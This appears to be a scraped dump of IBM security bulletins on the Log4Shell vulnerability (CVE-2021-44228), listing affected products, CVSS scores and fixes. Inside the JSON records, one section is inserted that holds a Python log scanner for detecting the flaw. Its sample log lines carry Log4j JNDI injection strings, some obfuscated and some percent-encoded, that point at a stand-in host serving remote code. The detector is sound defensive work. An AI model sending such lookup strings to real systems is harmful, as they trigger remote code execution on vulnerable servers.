Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7L5K\",\"label\":\"IBM Edge Application Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"4.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-23T18:23:33", "type": "ibm", "title": "Security Bulletin: IBM Edge Application Manager is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T18:23:33", 
"id": "942A563AC62B9ED7ADC9AAA1A75FE9F97DA036B632DE9ECD7DC3CC1E19EC9A60", "href": "https://www.ibm.com/support/pages/node/6536936", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:00", "description": "## Summary\n\nWebSphere Application Server, which is bundled with IBM Cloud Pak for Applications, is exposed to a vulnerability in Apache Log4j (CVE-2021-44228)\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nPrincipal Products(s) and Version(s) Affected| Affected Supporting Product(s) and Version(s) \n---|--- \nIBM Cloud Pak for Applications, all versions| \n\nWebSphere Application Server\n\n * 9.0\n * 8.5 \n \n## Remediation/Fixes\n\nRefer to the following security bulletin for vulnerability details and information about fixes addressed by WebSphere Application Server which is shipped with IBM Cloud Pak for Applications.\n\n[Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU025\",\"label\":\"IBM Cloud and Cognitive Software\"},\"Product\":{\"code\":\"SSXO9Y\",\"label\":\"IBM WebSphere Hybrid Edition\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF012\",\"label\":\"IBM i\"},{\"code\":\"PF017\",\"label\":\"Mac OS\"},{\"code\":\"PF035\",\"label\":\"z\\/OS\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"all\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T06:51:04", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Applications is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T06:51:04", "id": "0172701FE5FE7C060372C9A6E7199B0E91A4F7E5904E7762F54202A8D4CB9759", "href": "https://www.ibm.com/support/pages/node/6526484", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:01", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM WebSphere Service Registry and Repository. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)| Affected Supporting Product and Version(s) \n---|--- \nWebSphere Service Registry and Repository V8.5| WebSphere Application Server V8.5.5 \n \n## Remediation/Fixes\n\nPlease consult the security bulletin: \n[Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) \nfor vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWLGF\",\"label\":\"WebSphere Service Registry and Repository\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"}],\"Version\":\"8.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T06:41:43", "type": "ibm", "title": "Security Bulletin: IBM WebSphere Service Registry and Repository is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T06:41:43", "id": "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "href": "https://www.ibm.com/support/pages/node/6526420", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:06", "description": "## Summary\n\nThere is a vulnerability in the version of Log4j that is part of IBM SPSS Statistics Subscription. IBM SPSS Statistics Subscription has addressed this vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nSPSS Statistics Subscription| 1.0 \n \n## Remediation/Fixes\n\nAffected Product(s)| Version(s)| Fixes \n---|---|--- \nSPSS Statistics Subscription| 1.0| [Sub-Statistics28-IF002](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Statistics&release=Subscription&platform=All&function=fixId&fixids=Sub-IM-S28STATC-ALL-IF002&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true> \"Sub-Statistics28-IF002\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS3PMY\",\"label\":\"IBM SPSS Statistics Subscription\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF017\",\"label\":\"Mac OS\"}],\"Version\":\"1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T20:44:40", "type": "ibm", "title": "Security Bulletin: Log4Shell Vulnerability affects IBM SPSS Statistics Subscription (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": 
"2021-12-21T20:44:40", "id": "7E2A7C8E981FCA78A12F6D8992BE35354D42B960D223A90BF210EE5B300BFB9E", "href": "https://www.ibm.com/support/pages/node/6526184", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:17", "description": "## Summary\n\nVulnerabilities in Apache Log4j2 affect the logging infrastructure in the TADataCollector command line tool in IBM App Connect Enterprise v11, v12. IBM App Connect Enterprise V11, V12 have addressed the applicable CVE. Given current information and analysis, IBM Integration Bus v10 and v9 are not affected. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM App Connect Enterprise V11.0.0.7 to V11.0.0.15\n\nIBM App Connect Enterprise V12.0.1.0 to V12.0.3.0\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by applying the patches listed in this table.\n\n**Product**\n\n| \n\n**VRMF**\n\n| APAR| \n\n**Remediation / Fix** \n \n---|---|---|--- \nIBM App Connect Enterprise V12 \n| V12.0.1.0 to V12.0.3.0| \n\nIT39377\n\n| \n\nInterim fix for APAR (IT39377) is available from\n\n[IBM Fix Central (distributed platforms)](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+App+Connect+Enterprise&release=12.0.1.0&platform=All&function=aparId&apars=IT39377+> \"IBM Fix Central \\(distributed platforms\\)\" )\n\nInterim fix for Windows is available from\n\n[12.0.1.0 IBM Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+App+Connect+Enterprise&release=12.0.1.0&platform=Windows+64-bit,+x86&function=aparId&apars=IT39377+> \"12.0.1.0 IBM Fix Central\" )\n\n[12.0.2.0 IBM Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+App+Connect+Enterprise&release=12.0.2.0&platform=Windows+64-bit,+x86&function=aparId&apars=IT39377+> \"12.0.2.0 IBM Fix Central\" )\n\n[12.0.3.0 IBM Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+App+Connect+Enterprise&release=12.0.3.0&platform=Windows+64-bit,+x86&function=aparId&apars=IT39377+> \"12.0.3.0 IBM Fix Central\" ) \n \nIBM App Connect Enterprise V11| V11.0.0.7 to V11.0.0.15| \n\nIT39377\n\n| \n\nInterim fix for APAR (IT39377) is available for v11.0.0.10-11.0.0.15 from\n\n[IBM Fix Central (distributed 
platforms)](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+App+Connect+Enterprise&release=11.0.0.15&platform=All&function=aparId&apars=IT39377+> \"IBM Fix Central \\(distributed platforms\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSDR5J\",\"label\":\"IBM App Connect Enterprise\"},\"Component\":\"-\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"-\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T14:10:20", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j affect IBM App Connect Enterprise V11, V12 (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T14:10:20", "id": "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "href": "https://www.ibm.com/support/pages/node/6527726", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:26", "description": "## Summary\n\nA vulnerability in Apache Log4j could allow an attacker to execute arbitrary code on the system. This vulnerability may affect the Help system in IBM Spectrum Copy Data Management\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
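The vulnerability description repeated in each bulletin above says the trigger is a "specially crafted code string" that makes Log4j resolve an attacker-controlled JNDI endpoint. What the bulletins do not show is what that string looks like in the logs of a system behind the affected product, or why a plain search for `${jndi:` is not enough: Log4j 2.x resolves `${...}` lookups recursively, so the prefix can be hidden behind `${lower:j}`, `${::-j}` and similar nested lookups, and HTTP clients usually send it percent-encoded. The following detector is an added example written for this page, not code from IBM or from any of the bulletins; it folds the obfuscation lookups that can be evaluated offline, then searches for the JNDI prefix. The access-log lines it scans are constructed for the example (documentation-range IP addresses), not real traffic.

```python
"""Detection logic for Log4Shell (CVE-2021-44228) lookup strings in request logs.

Added example, not part of any IBM bulletin. Log4j 2.x resolves ${...} lookups
recursively, so "${jndi:" can be hidden as ${${lower:j}ndi:...} or
${${::-j}ndi:...}; attackers also percent-encode the payload in URLs.
This scanner URL-decodes, folds the obfuscation lookups it can evaluate
offline, and only then looks for the JNDI prefix.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Lookups that resolve to a constant and are therefore usable purely for
# obfuscation. ${lower:x}/${upper:x} change case; "${key:-x}" is Log4j's
# default-value syntax and yields "x" whenever key is undefined (assumed here).
# env/sys/date lookups are left alone: their value is host dependent.
_LOWER = re.compile(r"\$\{\s*lower\s*:\s*([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{\s*upper\s*:\s*([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def fold_lookups(text: str, max_rounds: int = 20) -> str:
    """Replace innermost obfuscation lookups, repeating until nothing changes."""
    for _ in range(max_rounds):
        folded = _LOWER.sub(lambda m: m.group(1).lower(), text)
        folded = _UPPER.sub(lambda m: m.group(1).upper(), folded)
        folded = _DEFAULT.sub(lambda m: m.group(1), folded)
        if folded == text:
            break
        text = folded
    return text


def _balanced_body(s: str, start: int) -> str:
    """Return s[start:] up to the '}' closing the lookup opened before start,
    honouring nested ${...} so a target like ldap://${env:X}.evil/a stays whole."""
    depth, i = 1, start
    while i < len(s):
        if s.startswith("${", i):
            depth += 1
            i += 2
            continue
        if s[i] == "}":
            depth -= 1
            if depth == 0:
                return s[start:i]
        i += 1
    return s[start:]


def extract_jndi_targets(text: str) -> List[str]:
    """Every JNDI target (ldap://..., rmi://..., dns://...) found in text."""
    folded = fold_lookups(unquote(text))
    return [_balanced_body(folded, m.end()).strip() for m in _JNDI.finditer(folded)]


def scan_lines(lines) -> List[Tuple[int, str, List[str]]]:
    """(line number, raw line, targets) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        targets = extract_jndi_targets(line)
        if targets:
            hits.append((n, line, targets))
    return hits


# Constructed sample access-log lines (not real traffic). Line 4 carries the
# payload percent-encoded in the query string; line 5 is a lookup but not JNDI.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [13/Dec/2021:02:11:09 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:02:11:10 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:02:11:11 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b}"',
    '10.0.0.9 - - [13/Dec/2021:02:11:12 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fc%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.9 - - [13/Dec/2021:02:11:13 +0000] "GET /a HTTP/1.1" 200 10 "-" "${env:HOME}"',
]

if __name__ == "__main__":
    for n, _, targets in scan_lines(SAMPLE_ACCESS_LOG):
        print(f"line {n}: JNDI lookup -> {targets}")
```

Run it against web-server, proxy or WAF logs rather than the application's own Log4j output: those record the request as the attacker sent it, before a vulnerable logger has had the chance to resolve the lookup. The folding step is deliberately conservative; `${env:...}` and `${sys:...}` are left unresolved, so a target that embeds them is still reported, with the lookup visible in the reported string.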
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Copy Data Management| 2.2.14.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing this vulnerability now by upgrading.\n\n**Note: The below fix package included Log4j 2.15.**\n\n**IBM Spectrum Copy Data Management** \n**Affected Versions**| **Fixing** \n**Level**| **Platform**| **Link to Fix and Instructions \n** \n---|---|---|--- \n2.2.14.0| 2.2.14.1| Linux| <https://www.ibm.com/support/pages/node/6507419> \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n17 December 2021: Initial Publication \n20 December 2021: Updated Remediation/Fixes section to indicate that the fix package included Log4j 2.15 \n21 December 2021: Updated Affected Versions - only 2.2.14.0 is affected\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
